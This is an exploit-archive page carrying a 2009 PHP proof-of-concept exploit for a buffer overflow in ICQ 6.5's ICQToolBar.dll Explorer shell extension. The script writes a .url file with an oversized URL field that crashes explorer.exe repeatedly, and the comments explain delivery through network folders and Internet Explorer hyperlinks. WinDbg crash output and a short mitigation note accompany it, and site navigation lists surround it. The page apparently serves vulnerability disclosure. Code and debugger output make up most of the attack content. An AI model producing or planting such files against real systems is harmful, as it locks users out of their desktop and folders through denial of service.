ICQ 6.5 File Processing

ICQ 6.5 File Processing: Posted May 30, 2009; Authored by Nine:Situations:Group | Site retrogod.altervista.org; ICQ 6.5 URL Search Hook / ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow proof of concept exploit.; tags | exploit, remote, overflow, proof of concept; systems | windows; SHA-256 | 7db4ef3b45e02ee4e93761483eb3e15822ea237e62bf8f3e0332ef68373ae5f0; Download | Favorite | View

ICQ 6.5 File Processing

<?php
/*
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer
remote buffer overflow poc
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

If the resulting file is placed on the desktop, against ex. xp sp3
process explorer.exe will exit with code 1282 (0x502) that is
ERROR_STACK_BUFFER_OVERRUN and crash infinitely, you cannot even browse a folder
if the file is present in it
Solution: disable the shell extension, you may try shellexview by nirsoft

Note (added 30/05/2009, remote vector added): it works with network folders
too ...

against a win2k3 where explorer.exe is not patched with /GS flag:

(f44.104): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=???? <-----
0:010> g
(f44.104): Access violation - code c0000005 (!!! second chance !!!)
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=???? <-----
0:010> gn
eax=00000001 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000001
eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
SharedUserData!SystemCallStub+0x4:
7ffe0304 c3              ret

prepare a network folder with the .url file inside. This works
against Internet Explorer too by a hyperlink to the network folder
*/

$____x = "[InternetShortcut]\x0d\x0a".
         "URL=".str_repeat("\x61",2184);
file_put_contents("9sg_poc.url",$____x);
?>

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

ICQ 6.5 File Processing

ICQ 6.5 File Processing

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ICQ 6.5 File Processing

Share This

ICQ 6.5 File Processing

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems